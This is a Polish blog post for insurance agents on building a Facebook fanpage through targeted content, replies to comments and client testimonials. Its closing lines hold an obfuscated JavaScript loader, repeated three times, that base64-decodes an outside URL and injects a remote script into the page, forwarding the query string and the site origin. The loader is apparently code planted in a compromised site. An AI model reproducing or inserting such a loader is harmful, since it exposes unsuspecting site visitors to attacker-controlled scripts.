Chcę Wam opowiedzieć o tym, jak jako agent ubezpieczeniowy możesz budować swój fanpage.
Pierwszą rzeczą, którą powinieneś zrobić, to określić swoją grupę docelową. Wiesz, kto to są ci klienci i czego potrzebują w zakresie ubezpieczeń? Na podstawie tych informacji, możesz dostosować treści i styl komunikacji na fanpage’u.
Publikuj wartościowe treści. Chcesz zbudować lojalność klientów i zwiększyć ich zaangażowanie?
To publikuj wartościowe treści związane z ubezpieczeniami. Mogą to być artykuły, infografiki, zdjęcia i krótkie filmy z poradami.
W filmach opowiadaj o poradach dla nich, pokazuj zadowolonych klientów..
Nie zapominaj o odpowiadaniu na komentarze! Ważne jest, aby na bieżąco odpowiadać na komentarze od klientów i odpowiadać na ich pytania dotyczące ubezpieczeń. To pozwoli na budowanie relacji z klientami i zwiększenie zaangażowania na fanpage’u.
Kolejnym krokiem jest tworzenie spersonalizowanych treści. Spersonalizowanych tzn Twoich z Twoim udziałem. Nie kopiowane linki. Twoim klientom zależy na tym, aby poznać swojego agenta ubezpieczeniowego.
Następnie, musicie podzielić się referencjami. Referencje od zadowolonych klientów to doskonałe narzędzie marketingowe. Możecie je publikować na fanpage’u, aby pokazać, jakie korzyści przynosi posiadanie ubezpieczenia od waszej firmy. Jako Agenta otacza Cię marketing, a to klient po szkodzie zadowolony z zakresu polisy jaki mu zaproponowałeś, a to prosi Cię byś pomógł mu uzyskać dużą zniżkę, przyspieszył odszkodowanie itd To wszytko co Cię otacza a czego nie lubisz może być twoim rewelacyjnym materiałem marketingowym. Idąc dalej czy klient, którego dobrze ubezpieczyłeś, dałeś mu zniżkę nie podziękuje Ci opinią na Twoim fanpage? Zrobi zdjęcie lub nagraj krótki film, dodaj opis i umieść na swoim fanpage.
Oczywiście, możesz na swoim profilu chwalić się zdjęciami dyplomów jakie dostałeś od Towarzystw Ubezpieczeniowych. Chodź ja jako klient wolałbym zobaczyć jak mój agent pomógł innemu klientowi. Lub ubezpieczył go tak ze w przypadku szkody klient nie został stratny. Możesz zawsze zrobić wspólne zdjęcie z zadowolonym klientem, opisać temat lub nagrać krótki film z relacji. Co z tego, że nie będzie profesjonalny., ważniejsze będzie Twoje zaangażowanie i pomóc klientowi.
I na koniec, musisz być aktywny. Ważne jest, aby regularnie publikować treści na fanpage’u i być aktywnym w komunikacji z klientami.
To pozwoli na budowanie pozytywnego wizerunku i zwiększenie zaangażowania klientów. Tak trzymaj!
W następnym blogu o Facebooku podpowiem Ci jak zaplanować posty? O jakich tematach mogą opowiadać i jak często je udostępniać? Jak się do nic przygotować?
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();